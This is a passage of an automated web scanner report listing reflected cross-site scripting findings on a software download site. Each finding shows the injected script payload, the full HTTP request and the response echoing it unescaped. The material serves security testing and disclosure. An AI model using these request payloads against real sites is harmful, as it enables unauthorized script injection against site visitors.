HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:43 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191" /> ...[SNIP]...
1.49. http://www.x64bitdownload.com/64-bit-group-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-group-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d774c"><script>alert(1)</script>b7a347567e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:39:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:55 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6e64"><script>alert(1)</script>c521abd2a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:16 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32113
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a" /> ...[SNIP]...
1.51. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-highspeed-connection-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79657"><script>alert(1)</script>383139ca774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:00 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7aa"><script>alert(1)</script>41d624163b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:11 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0" /> ...[SNIP]...
1.53. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-image-grabber-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aaf"><script>alert(1)</script>49c2f266fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:05:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a03"><script>alert(1)</script>f40fb3cd2d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:46:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:31 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3" /> ...[SNIP]...
1.55. http://www.x64bitdownload.com/64-bit-images-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-images-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8785c"><script>alert(1)</script>d2427e65c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:43:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:06 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ae4"><script>alert(1)</script>dfb91f562dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:32 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:41 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc" /> ...[SNIP]...
1.57. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"><script>alert(1)</script>8719bbde82f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:32 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab88e"><script>alert(1)</script>e25a069793d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:51:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:01:30 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d" /> ...[SNIP]...
1.59. http://www.x64bitdownload.com/64-bit-internet-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-internet-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c18b"><script>alert(1)</script>4608bc7414f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:58:13 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1" /> ...[SNIP]...
1.60. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-kill-file-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955cd"><script>alert(1)</script>a4826d7de3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:34 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:07 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1" /> ...[SNIP]...
1.61. http://www.x64bitdownload.com/64-bit-killfile-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-killfile-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a32"><script>alert(1)</script>3d9f059b861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:49 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:50 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a24e"><script>alert(1)</script>93d52a361a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 95008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4" /> ...[SNIP]...
1.63. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-mp3-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1733"><script>alert(1)</script>a1ee4a1cc7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:41:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 95011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6969"><script>alert(1)</script>002478f819e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
